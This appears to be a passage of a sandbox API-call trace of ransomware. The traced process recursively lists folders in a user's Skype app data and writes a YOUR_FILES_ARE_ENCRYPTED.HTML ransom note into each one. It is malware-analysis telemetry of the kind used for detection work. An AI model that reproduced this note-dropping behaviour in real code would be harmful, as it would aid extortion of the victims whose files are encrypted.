lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0117.620] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.620] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0117.620] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.620] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache") returned 94 [0117.620] GetProcessHeap () returned 0x600000 [0117.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.621] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache" [0117.621] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache\\*" [0117.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.754] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.754] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.754] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.754] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0117.754] GetProcessHeap () returned 0x600000 [0117.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.756] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.757] CloseHandle (hObject=0x214) returned 1 [0117.757] GetProcessHeap () returned 0x600000 [0117.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.757] GetProcessHeap () returned 0x600000 [0117.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.757] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0117.757] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.757] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies") returned 96 [0117.757] GetProcessHeap () returned 0x600000 [0117.757] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.757] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies" [0117.757] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies\\*" [0117.757] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x626638 [0117.758] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.758] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.758] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0117.758] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0117.758] GetProcessHeap () returned 0x600000 [0117.758] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.759] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.760] CloseHandle (hObject=0x214) returned 1 [0117.760] GetProcessHeap () returned 0x600000 [0117.760] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.760] GetProcessHeap () returned 0x600000 [0117.760] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.760] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0117.761] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.761] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory") returned 96 [0117.761] GetProcessHeap () returned 0x600000 [0117.761] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.761] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory" [0117.761] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory\\*" [0117.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.761] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.761] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.761] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.762] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0117.762] GetProcessHeap () returned 0x600000 [0117.762] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.763] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.764] CloseHandle (hObject=0x214) returned 1 [0117.764] GetProcessHeap () returned 0x600000 [0117.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.764] GetProcessHeap () returned 0x600000 [0117.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.764] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 1 [0117.764] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.764] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp") returned 89 [0117.764] GetProcessHeap () returned 0x600000 [0117.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.764] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp" [0117.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp\\*" [0117.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0117.765] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.765] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f058, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0117.765] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.765] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0117.765] GetProcessHeap () returned 0x600000 [0117.765] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.766] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.767] CloseHandle (hObject=0x214) returned 1 [0117.767] GetProcessHeap () returned 0x600000 [0117.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.768] GetProcessHeap () returned 0x600000 [0117.768] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.768] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 0 [0117.768] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0117.768] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0117.768] GetProcessHeap () returned 0x600000 [0117.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0117.769] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.770] CloseHandle (hObject=0x324) returned 1 [0117.770] GetProcessHeap () returned 0x600000 [0117.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.770] GetProcessHeap () returned 0x600000 [0117.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.771] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf831b7dc, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf831b7dc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0117.771] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.772] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AppData") returned 89 [0117.772] GetProcessHeap () returned 0x600000 [0117.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.773] lstrcpyW (in: 